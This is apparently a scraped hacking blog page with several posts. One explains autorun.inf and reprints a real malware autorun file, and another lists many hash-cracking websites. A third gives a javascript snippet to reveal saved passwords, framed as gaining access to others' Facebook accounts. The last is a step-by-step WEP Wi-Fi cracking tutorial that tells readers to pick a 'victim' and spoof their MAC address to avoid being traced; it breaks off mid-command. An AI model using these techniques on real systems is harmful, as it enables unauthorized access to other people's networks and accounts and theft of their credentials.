trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO9ADfThJIgfDPClXURg-UpByQG2iWzhkf6fMKWvTd6tXh8etS8oKh8Af2BijCI7q1CAAT9TgQX1YR94xqrDF6pwswbxqYqNht-J0RU5IYXavIyUwoyjaAMf2owr3baxWaxZwwWdRMWyw/s1600/VirusAttack.png" imageanchor="1" style="clear: left; color: #a91b33; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO9ADfThJIgfDPClXURg-UpByQG2iWzhkf6fMKWvTd6tXh8etS8oKh8Af2BijCI7q1CAAT9TgQX1YR94xqrDF6pwswbxqYqNht-J0RU5IYXavIyUwoyjaAMf2owr3baxWaxZwwWdRMWyw/s1600/VirusAttack.png" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;" /></a></div><br />
When i studied second year(cse), my friends told that autorun.inf is virus. I thought so. Because my antivirus blocks autorun.inf files. In third year when i search about autorun.inf file in net, i realize about the auto run file.<br />
<br />
Today i bring some files from my college system. When i insert the pen drive in my system, there are lot of exe files.They are viruses. I delete all of them. Finally i opened the autorun.inf file in notepad and saw the instructions. Then only i remembered that i forget to post about autorun file. This article will give you complete details about the autorun.inf file.<br />
This is the instructions that saved in the infected(call virus programs) autorun.inf file:<br />
<br />
<a href="" name="more" style="color: #a91b33; text-decoration: none;"></a><br />
<br />
<blockquote style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; color: black; height: 130px; line-height: 1.3em; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">[Autorun]<br />
Open=RECYCLER\QqFvXcB.exe<br />
Explore=RECYCLER\QqFvXcB.exe<br />
AutoPlay=RECYCLER\QqFvXcB.exe<br />
shell\Open\Command=RECYCLER\QqFvXcB.exe<br />
shell\Open\Default=1<br />
shell\Explore\command=RECYCLER\QqFvXcB.exe<br />
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe</blockquote><br />
<br />
<br />
is autorun.inf virus file? no. Then why antivirus block the autorun.inf files? Go ahead to know the full details about auto run file.<br />
<br />
<b>Introduction to Autorun.inf File:</b><br />
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted. Simpy triggers.<br />
<br />
When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).<br />
<br />
<b>How to create Autorun file?</b><br />
Open notepad<br />
type this command:<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">[Autorun]</div>save the file as "autorun.inf" (select all files, not text )<br />
<br />
<b>Complete Syntax and instructions inside the Autorun file:</b><br />
Basic syntax must be inside the autorun.inf file is :<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">[Autorun]</div>This will be used to identify the the file as autorun.<br />
<br />
<i><u>OPEN=</u></i><br />
This will specify which application should be opened when the cd or pen drive is opened<br />
<br />
Example:<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">open=virus.exe</div>This will launch the virus.exe file when cd or pen drive is opened. The file should be in root directory.<br />
if the file is in any other sub directories ,then we have to specify it.<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">Open=RECYCLER\Virus.exe</div><u><i>Explore=</i></u><br />
Nothing big difference. if you right click and select explore option in cd or pen drive. This command will be run.<br />
<br />
<u><i>AutoPlay=</i></u><br />
Same as the above , but it will launch the the program when auto played.<br />
<br />
<br />
SHELL\VERB =<br />
<br />
The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.<br />
<br />
Example:<br />
<br />
<blockquote style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; color: black; height: 130px; line-height: 1.3em; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">shell\Open\Command=RECYCLER\QqFvXcB.exe<br />
shell\Open\Default=1<br />
shell\Explore\command=RECYCLER\QqFvXcB.exe<br />
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe</blockquote><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><br />
<br />
Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)<br />
<br />
<u><i>Icon=</i></u><br />
Change the icon of your pen drive or cd. you can use .ico,.bmp images(also .exe,.dll)<br />
<br />
Example:<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">icon=breakthesecurity.ico</div><i><u>Label=</u></i><br />
<br />
Specifies a text label to displayed for this CD in Explorer<br />
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.<br />
<br />
Example:<br />
<div class="code_box" style="background-attachment: initial; background-clip: initial; background-color: #dff0ff; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(187, 187, 187); border-bottom-left-radius: 5px 5px; border-bottom-right-radius: 5px 5px; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; border-top-style: dashed; border-top-width: 1px; color: black; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;">Label=Ethical hacking</div><b><br />
</b><br />
<b>Why Antivirus Block Autorun.inf file?</b><br />
From above ,you come to know that autorun.inf file is not virus. But why antivirus blocks it? Because as i told autorun file call or launch any application or exe files. It will lead to virus attack. If the autorun.inf is blocked,then there is no way to launch the virus code.<br />
<br />
Autorun is not virus but it can call virus files.</div><div dir="ltr" style="text-align: left;" trbidi="on"><br />
</div><div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://www.breakthesecurity.com/2011/03/hacking-autoruninf-virus-attackis.html">http://www.breakthesecurity.com/2011/03/hacking-autoruninf-virus-attackis.html</a></div></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-39140519582001017332011-04-27T00:27:00.000-07:002011-04-27T00:27:23.009-07:00List of Websites to crack the MD5 Hash Algorithm<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 18px;"></span><br />
<h3 class="post-title entry-title" style="color: #444444; font-family: Georgia, 'Times New Roman'; font-size: 18px; font-weight: normal; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 10px;">A List of Message Digest(MD5) Cracking websites</h3><div class="post-header"><div class="post-header-line-1"></div></div><div class="post-body entry-content" style="line-height: 1.6em; margin-bottom: 0.75em; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="float: right; margin-left: 10px;"><div class="addthis_toolbox addthis_default_style "><a class="addthis_button_compact at300m" href="http://www.addthis.com/bookmark.php?v=250&username=xa-4d0b61e94327a262" style="color: #a91b33; cursor: pointer; float: left; padding-bottom: 0px; padding-left: 2px; padding-right: 2px; padding-top: 0px; text-decoration: none;"><span class="at300bs at15nc at15t_compact" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s7.addthis.com/static/r07/widget29.png); background-origin: initial; background-position: 0px -3376px; background-repeat: no-repeat no-repeat; cursor: pointer; display: block; float: left; height: 16px; line-height: 16px; margin-right: 4px; overflow-x: hidden; overflow-y: hidden; width: 16px;"></span>Share</a><div class="atclear" style="clear: both;"></div></div></div><div dir="ltr" style="text-align: left;" trbidi="on">http://www.md5lookup.com/<br />
http://md5.rednoize.com<br />
http://nz.md5.crysm.net<br />
http://us.md5.crysm.net<br />
http://md5crack.com/crackmd5.php<br />
<a href="" name="more" style="color: #a91b33; text-decoration: none;"></a><br />
http://www.xmd5.org<br />
http://gdataonline.com<br />
http://www.hashchecker.com<br />
http://passcracking.ru<br />
http://www.milw0rm.com/md5<br />
http://plain-text.info<br />
http://www.securitystats.com/tools/hashcrack.php<br />
http://www.schwett.com/md5/<br />
http://passcrack.spb.ru/ ->sha1<br />
http://shm.pl/md5/<br />
http://www.und0it.com/<br />
http://www.neeao.com/md5/<br />
http://md5.benramsey.com/<br />
http://www.md5decrypt.com/<br />
http://md5.khrone.pl/<br />
http://www.csthis.com/md5/index.php<br />
http://www.securitystats.com/tools/hashcrack.php ->sha1<br />
http://www.md5decrypter.com/<br />
http://www.md5encryption.com/ ->sha1<br />
http://www.md5database.net/<br />
http://md5.xpzone.de/<br />
http://www.milw0rm.com/md5/info.php<br />
http://md5.geeks.li/<br />
http://www.hashreverse.com/ ->sha1<br />
http://www.cmd5.com/english.aspx<br />
http://www.md5.altervista.org/<br />
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en<br />
http://alimamed.pp.ru/md5/<br />
http://md5crack.it-helpnet.de/index.php?op=add<br />
http://cijfer.hua.fi/<br />
http://shm.hard-core.pl/md5/<br />
http://www.mmkey.com/md5/HOME.ASP<br />
http://www.thepanicroom.org/index.php?view=cracker<br />
http://rainbowtables.net/services/results.php ->sha1<br />
http://rainbowcrack.com/ ->sha1<br />
http://www.securitydb.org/cracker/<br />
http://passwordsecuritycenter.com/in…roducts_ id=7<br />
http://0ptix.co.nr/md5<br />
https://www.astalavista.net/?cmd=rainbowtables<br />
http://ice.breaker.free.fr/<br />
http://www.md5this.com<br />
http://www.shalookup.com/ ->sha1<br />
<b><br />
lm Only:</b><br />
http://sys9five.ath.cx:8080/hak5rtables/<br />
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/<br />
<br />
some more links<br />
<br />
http://linardy.com/md5.php<br />
http://www.gdataonline.com/seekhash.php<br />
http://www.md5-db.com/<br />
https://www.w4ck1ng.com/cracker/<br />
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/<br />
http://www.hashchecker.com/index.php?_sls=search_hash<br />
http://www.milw0rm.com/md5/<br />
http://www.mmkey.com/md5/<br />
http://www.rainbowcrack-online.com/<br />
http://www.securitydb.org/cracker/<br />
http://www.securitystats.com/tools/hashcrack.php<br />
http://schwett.com/md5/<br />
http://www.und0it.com/<br />
http://www.md5.org.cn/index_en.htm<br />
http://www.xmd5.org/index_en.htm<br />
http://www.tmto.org<br />
http://md5.rednoize.com/<br />
http://nz.md5.crysm.net/<br />
http://us.md5.crysm.net/<br />
http://gdataonline.com/seekhash.php<br />
http://passcracking.ru/<br />
http://shm.pl/md5/<br />
http://www.neeao.com/md5/<br />
http://md5.benramsey.com/<br />
http://www.md5decrypt.com/<br />
http://md5.khrone.pl/<br />
http://www.csthis.com/md5/index.php<br />
http://www.md5decrypter.com/<br />
http://www.md5encryption.com/<br />
http://www.md5database.net/<br />
http://md5.xpzone.de/<br />
http://www.hashreverse.com/<br />
http://alimamed.pp.ru/md5/<br />
http://md5crack.it-helpnet.de/index.php?op=add<br />
http://shm.hard-core.pl/md5/<br />
http://rainbowcrack.com/<br />
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7<br />
https://www.astalavista.net/?cmd=rainbowtables<br />
http://ice.breaker.free.fr/<br />
http://www.md5this.com/<br />
http://hackerscity.free.fr/<br />
http://md5.allfact.info/<br />
http://bokehman.com/cracker/<br />
http://www.tydal.nu/article/md5-crack/<br />
http://passcracking.com/<br />
http://ivdb.org/search/md5/<br />
http://md5.netsons.org/<br />
http://md5.c.la/<br />
http://www.md5-db.com/index.php<br />
http://md5.idiobase.de/<br />
http://md5search.deerme.org/</div></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-76649874753777834502011-01-15T03:43:00.000-08:002011-01-15T03:43:13.498-08:00View Password Behind Asterik [in facebook]. . .Only can gain access if thre is other account loggged out and the password is in the form of asterik. . . <br />
<br />
At Address bar paste the following code... <br />
<br />
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var <br />
w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + <br />
' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return <br />
b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is <br />
blank')}return true;}}<br />
<br />
ENJOY.deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-38557609111557523532011-01-12T05:51:00.000-08:002011-01-12T05:51:25.090-08:00How to Hack Wifi or Wireless Password<div style="color: red; font-family: Georgia,"Times New Roman",serif;"><span style="font-size: medium;"><b>STEPS TO HACK WIFI OR WIRELESS PASSWORD</b></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Download Backtrack Linux Live CD from here:<a href="http://www.blogger.com/goog_1051625565"> </a><a href="http://www.backtrack-linux.org/downloads/">CLICK HERE</a></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><span style="color: #741b47; font-size: medium;"><b>2. SCAN TO GET THE VICTIM</b></span></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Get the victim to attack that is whose password you want to hack or crack.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a <b>"KONSOLE"</b> . Now you should start your Wifi card. To do it so type </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">airmon-ng</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">airmon-ng stop ath0</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">then type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">ifconfig wifi0 down</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">then type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">macchanger --mac 00:11:22:33:44:55 wifi0</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">then type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">airmon-ng start wifi0</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Now type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">airodump-ng ath0</span></div></blockquote><br />
All above steps in one screen shot:</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg104iXwGILyts17bArqUKpVico6QwwOxcVJ-UWSCjirMIsNMcQn4f2KUCZ3-zlU1kAmtJ7UhSuVHyminW7WLUg05p7VhYIpXYT0w1EznNo4VLzMj1HxNn-5Di496mi_J4Fv4B1W8P1dNE/s1600/wepcrack01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg104iXwGILyts17bArqUKpVico6QwwOxcVJ-UWSCjirMIsNMcQn4f2KUCZ3-zlU1kAmtJ7UhSuVHyminW7WLUg05p7VhYIpXYT0w1EznNo4VLzMj1HxNn-5Di496mi_J4Fv4B1W8P1dNE/s320/wepcrack01.png" width="320" /></a></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.</span></div><span style="font-size: x-small;">Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.</span><br />
<span style="font-size: x-small;">Now you will see something like this:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo07FCGDjJgiq8QRxigk0kdiH3X7if6rIS48gEbR8iUrKVN5a8DffhS7tKXiayqgnI5472VdaEVyNxnxbrdhUkXTShV0SJn0DWkqdp4-BPv2fwIGsNEJlMKpHK4_QTMpqY7SDrSUBWZgc/s1600/wepcrack02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo07FCGDjJgiq8QRxigk0kdiH3X7if6rIS48gEbR8iUrKVN5a8DffhS7tKXiayqgnI5472VdaEVyNxnxbrdhUkXTShV0SJn0DWkqdp4-BPv2fwIGsNEJlMKpHK4_QTMpqY7SDrSUBWZgc/s320/wepcrack02.png" width="320" /></a></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><span style="font-size: medium;"><b>3. <span style="color: #741b47;">SELECTING NETWORK FOR HACKING </span></b></span></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><span style="font-size: x-small;">Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhUYORVXmiAdweTsR9fC5gYm80UJCcd8fQ0uy8LBstIBCjO0UVGp5N7uIm3iayGvdqmk4QmklDRYiIlz6YXXZe832I1RlvoRyzcwklNx-1dBKiFX9r6SOv9EB3qWGk7wtq_cr5BXpSZ4/s1600/wepcrack03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhUYORVXmiAdweTsR9fC5gYm80UJCcd8fQ0uy8LBstIBCjO0UVGp5N7uIm3iayGvdqmk4QmklDRYiIlz6YXXZe832I1RlvoRyzcwklNx-1dBKiFX9r6SOv9EB3qWGk7wtq_cr5BXpSZ4/s320/wepcrack03.png" width="320" /></a></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this -- </span><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">00:23:69:bb:2d:of</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
The Channel number will be under a heading that says "CH".</span></div><div style="font-family: Georgia,"Times New Roman",serif;">As shown in this figure:</div><div style="font-family: Georgia,"Times New Roman",serif;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4S06rO8f9Mq7ISBRnezE1-i04Z8NCtjlNCfUVnvT_cNC4EQVHgM_44hZeyPrdkAhWv4_1ugL7n4vcoH0x8skGJdcEqrujeW6LlVRbg52zsyF_vUiRq9E62hm8dgCwCFTWmufYKrpHFU/s1600/wepcrack04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4S06rO8f9Mq7ISBRnezE1-i04Z8NCtjlNCfUVnvT_cNC4EQVHgM_44hZeyPrdkAhWv4_1ugL7n4vcoH0x8skGJdcEqrujeW6LlVRbg52zsyF_vUiRq9E62hm8dgCwCFTWmufYKrpHFU/s320/wepcrack04.png" width="320" /></a></div><div style="font-family: Georgia,"Times New Roman",serif;"> </div><span style="font-size: x-small;"> </span><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Now in the same KONSOLE window type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0</span></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. Its simply because i love ben10....hhahahahaha :D</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.</span><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"></span><br />
<span style="font-size: x-small;"></span><br />
<span style="font-size: x-small;"><br />
<span style="font-size: medium;"><b style="color: #741b47;">4. Cracking the WEP password</b></span><br />
<br />
Now leave this Konsole window up and running and open up a 2nd Konsole window.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> In this window type:</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0</span></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
